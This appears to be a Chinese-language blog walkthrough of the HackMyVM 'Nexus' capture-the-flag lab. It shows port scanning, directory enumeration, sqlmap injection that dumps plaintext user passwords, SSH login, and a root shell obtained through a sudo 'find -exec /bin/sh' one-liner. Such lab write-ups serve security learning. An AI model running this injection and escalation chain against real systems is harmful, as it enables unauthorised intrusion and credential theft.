Pepster'Blog
HackMyVM-Nexus-Walkthrough
城南花已开 Lv6
  2025-06-06 19:44:35   2025-06-15 17:23:33    1.3k 字  7 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.143  08:00:27:a4:e3:58       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:7e:1b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.055 seconds (124.57 hosts/sec). 4 responded
export ip=192.168.60.143
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.143:22
Open 192.168.60.143:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-06 19:46 CST
Initiating ARP Ping Scan at 19:46
Scanning 192.168.60.143 [1 port]
Completed ARP Ping Scan at 19:46, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:46
Completed Parallel DNS resolution of 1 host. at 19:46, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:46
Scanning 192.168.60.143 [2 ports]
Discovered open port 22/tcp on 192.168.60.143
Discovered open port 80/tcp on 192.168.60.143
Completed SYN Stealth Scan at 19:46, 0.07s elapsed (2 total ports)
Nmap scan report for 192.168.60.143
Host is up, received arp-response (0.00041s latency).
Scanned at 2025-06-06 19:46:35 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:A4:E3:58 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

目录枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.143
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 352]
/index2.php           (Status: 200) [Size: 75134]
Progress: 441118 / 441120 (100.00%)
===============================================================
Finished

浏览器访问一下,在输出部分看到了十六进制编码

image

解码得到

1
2
Hola Alita, espero que estes leyendo este mensaje codificado, para poder hackear el sistema tienes que aplicar la técnica que te expliqué, te he dejado el acceso con la clave eval "pandora". Nos vemos en la red.
你好,阿丽塔,希望你正在阅读这条编码的信息。要想破解系统,你需要使用我之前解释过的技术。我已经留下了访问权限,密码是 eval "pandora"。我们网络上见。

同时也找到认证登录的路径

/auth-login.php

image

SQLmap

实际上,拿到的信息没有什么用

在登陆表单这可以尝试使用sqlmap直接梭哈即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
❯ sqlmap -u "http://192.168.60.143/auth-login.php" --forms --batch --dbs
…………………………

available databases [6]:
[*] information_schema
[*] mysql
[*] Nebuchadnezzar
[*] performance_schema
[*] sion
[*] sys

[20:03:52] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-06062025_0803pm.csv'
[20:03:52] [WARNING] your sqlmap version is outdated

[*] ending @ 20:03:52 /2025-06-06/

❯ sqlmap -u "http://192.168.60.143/auth-login.php" --forms --batch -D Nebuchadnezzar --tables

……………………
[1 table]
+-------+
| users |
+-------+

[20:04:04] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-06062025_0804pm.csv'
[20:04:04] [WARNING] your sqlmap version is outdated

[*] ending @ 20:04:04 /2025-06-06/

❯ sqlmap -u "http://192.168.60.143/auth-login.php" --forms --batch -D Nebuchadnezzar -T users --dump

………………
Database: Nebuchadnezzar
Table: users
[2 entries]
+----+--------------------+----------+
| id | password           | username |
+----+--------------------+----------+
| 1  | F4ckTh3F4k3H4ck3r5 | shelly   |
| 2  | cambiame2025       | admin    |
+----+--------------------+----------+

[20:04:12] [INFO] table 'Nebuchadnezzar.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.143/dump/Nebuchadnezzar/users.csv'
[20:04:12] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-06062025_0804pm.csv'
[20:04:12] [WARNING] your sqlmap version is outdated

[*] ending @ 20:04:12 /2025-06-06/

登录尝试后,没什么东西

用户提权

尝试利用凭证登录ssh

用户拥有sudo权限可以执行find

没啥好说的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
❯ ssh shelly@$ip
The authenticity of host '192.168.60.143 (192.168.60.143)' can't be established.
ED25519 key fingerprint is SHA256:r1lUfXxL8Fd1e/Q87Jno3P3xHjMTUwmJlKfcsl0AST8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.143' (ED25519) to the list of known hosts.
**************************************************************
HackMyVM System                                              *
                                                             *
   *  .  . *       *    .        .        .   *    ..        *
 .    *        .   ###     .      .        .            *    *
    *.   *        #####   .     *      *        *    .       *
  ____       *  ######### *    .  *      .        .  *   .   *
 /   /\  .     ###\#|#/###   ..    *    .      *  .  ..  *   *
/___/  ^8/      ###\|/###  *    *            .      *   *    *
|   ||%%(        # }|{  #                                    *
|___|,  \\         }|{                                       *
                                                             *
                                                             *
Wellcome to Nexus Vault.                                     *
**************************************************************



[email protected]'s password:


######################
DONT TOUCH MY SYSTEM #
######################
Last login: Thu May  8 22:44:41 2025 from 192.168.1.10
shelly@NexusLabCTF:~$ cd SA/
shelly@NexusLabCTF:~/SA$ ls -al
total 12
drwxr-xr-x 2 root   root   4096 may  8 17:07 .
drwx------ 4 shelly shelly 4096 may  8 22:51 ..
-rw-r--r-- 1 root   root    804 may  8 17:07 user-flag.txt
shelly@NexusLabCTF:~/SA$ cat user-flag.txt

   ▄█    █▄      ▄▄▄▄███▄▄▄▄    ▄█    █▄
  ███    ███   ▄██▀▀▀███▀▀▀██▄ ███    ███
  ███    ███   ███   ███   ███ ███    ███
 ▄███▄▄▄▄███▄▄ ███   ███   ███ ███    ███
▀▀███▀▀▀▀███▀  ███   ███   ███ ███    ███
  ███    ███   ███   ███   ███ ███    ███
  ███    ███   ███   ███   ███ ███    ███
  ███    █▀     ▀█   ███   █▀   ▀██████▀

HackMyVM
Flag User ::  82kd8FJ5SJ00HMVUS3R36gd
shelly@NexusLabCTF:~$ sudo -l
sudo: unable to resolve host NexusLabCTF: Nombre o servicio desconocido
Matching Defaults entries for shelly on NexusLabCTF:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD, use_pty

User shelly may run the following commands on NexusLabCTF:
    (ALL) NOPASSWD: /usr/bin/find

Root提权

find提权

然而flag还藏在图片里,strings即可

1
2
3
4
5
6
7
shelly@NexusLabCTF:~/SA$ sudo find . -exec /bin/sh \; -quit
sudo: unable to resolve host NexusLabCTF: Nombre o servicio desconocido
# id
uid=0(root) gid=0(root) grupos=0(root)
# bash
root@NexusLabCTF:~# strings Sion-Code/use-fim-to-root.png |tail -n 1
;HMV-FLAG[[ p3vhKP9d97a7HMV79ad9ks2s9 ]]
  1. 信息收集
    1. 服务探测
    2. SQLmap
  2. 用户提权
  3. Root提权
总字数 633.1k
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
  1. 信息收集
    1. 服务探测
    2. SQLmap
  2. 用户提权
  3. Root提权